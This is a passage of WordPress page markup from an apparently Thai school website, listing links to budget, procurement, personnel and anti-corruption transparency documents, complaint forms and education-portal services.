href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br><a href=\"https://drive.google.com/file/d/1cgINnIyago0IrJkXeI7V2y4G4p5Zq3yR/view?usp=sharing\">     - คู่มือฝ่ายบริหารงานงบประมาณ</a><br><a href=\"https://drive.google.com/file/d/1DstLLhCLdPqU3gL1bu5p0UByVlg4Yt9t/view?usp=drive_link\">  - คู่มือฝ่ายบริหารงานวิชาการ</a><br><a href=\"https://drive.google.com/file/d/1d2db3xyqZbucO821fPXAU0frbQC9W5KA/view?usp=drive_link\" data-type=\"page\" data-id=\"2\"> - คู่มือฝ่ายบริหารงานบุคคล</a><br> <a href=\"https://drive.google.com/file/d/1QhT6YZ7u_mYXsy_mZUDQXHL1Yx0XHO7B/view?usp=drive_link\">  - คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1woP9ChkM3zQI8gthAIPX43-z4ymQZZLk/view?usp=drive_link\" data-type=\"page\" data-id=\"2\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1JpT_5pzV7hlbP1epiDCWYSAQG-UOkUeD/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1JpT_5pzV7hlbP1epiDCWYSAQG-UOkUeD/view?usp=drive_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1YhuyYvmrvtvgv6jkYfYHMulIorbiuLIA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1Nf4XWZmTyc4NdsmEJfShsVdo2WXGwzgr/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1fYwZNgW-VtyshJmctqYo_ZKlKE-M6JS1/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1fYwZNgW-VtyshJmctqYo_ZKlKE-M6JS1/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/15xtXTS0J1eFadldJs36XtPWecBT7tkDc/view?usp=sharing\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1l-VlfXu6thxBFvL0JpgAcCUrTrqNNp4G/view?usp=sharing\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1AeKeechkWj0RdYe5xvMgrFXsQiTu26xV/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_ecdd7d-71\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container 